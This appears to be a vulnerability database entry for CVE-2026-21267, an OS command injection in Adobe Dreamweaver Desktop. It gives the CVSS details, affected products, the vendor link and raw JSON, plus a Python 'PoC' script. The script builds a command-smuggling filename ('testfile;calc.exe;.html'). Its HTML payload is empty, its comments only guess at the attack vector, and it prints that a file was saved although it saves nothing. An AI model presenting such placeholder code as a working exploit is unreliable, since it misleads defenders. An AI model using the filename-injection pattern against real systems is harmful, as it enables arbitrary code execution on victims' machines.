Security Vulnerability Report
CVE-2026-21267 CVSS 8.6 HIGH

CVE-2026-21267

Published: 2026-01-13 19:16:24
Last Modified: 2026-01-14 20:51:16

Description

Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an attacker. Exploitation of this issue requires user interaction in that a victim must open a malicious file, and scope is changed.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dreamweaver:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Dreamweaver Desktop <= 21.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21267 PoC - Adobe Dreamweaver OS Command Injection
# This PoC demonstrates the OS command injection vulnerability in Dreamweaver
# DISCLAIMER: For educational and authorized security testing only

import os
import base64


def generate_malicious_file():
    """
    Generate a malicious file that exploits CVE-2026-21267
    The file contains OS commands that will be executed by Dreamweaver
    """
    # Malicious payload - attempts to execute calc.exe as proof of concept
    # In real attack, this could be any system command
    malicious_command = "calc.exe"

    # The PoC file content - in real scenario this would be a file format
    # that Dreamweaver processes (e.g., .html, .php, .dwt, etc.)
    poc_content = f'''
<!-- CVE-2026-21267 PoC -->
<!-- This file attempts to inject OS command via Dreamweaver processing -->
<html>
<body>
<script>
// Malicious content that triggers OS command injection
// when processed by vulnerable Dreamweaver version
</script>
</body>
</html>
'''

    # Alternative: If the vulnerability is in file path handling,
    # a filename with command injection characters could trigger it
    malicious_filename = f"testfile;{malicious_command};.html"

    print("[*] CVE-2026-21267 PoC Generator")
    print(f"[*] Malicious command: {malicious_command}")
    print(f"[*] Generated PoC file content saved")

    return poc_content, malicious_filename


def main():
    print("=" * 50)
    print("CVE-2026-21267 Adobe Dreamweaver OS Command Injection")
    print("=" * 50)

    content, filename = generate_malicious_file()

    print("\n[*] PoC generated successfully")
    print("[*] To test:")
    print(" 1. Open the generated file with vulnerable Dreamweaver version")
    print(" 2. Observe if the injected command is executed")
    print("\n[!] This PoC is for authorized testing only")


if __name__ == "__main__":
    main()

References

https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21267", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:24.213", "lastModified": "2026-01-14T20:51:15.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed."}, {"lang": "es", "value": "Las versiones 21.6 y anteriores de Dreamweaver Desktop están afectadas por una vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando del SO ('Inyección de Comandos del SO') que podría conducir a la ejecución de código arbitrario por un atacante. La explotación de este problema requiere interacción del usuario, ya que una víctima debe abrir un archivo malicioso y el ámbito se modifica."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dreamweaver:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.7", "matchCriteriaId": "18B387B5-7F08-419A-B3EC-3CB93C7E9288"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}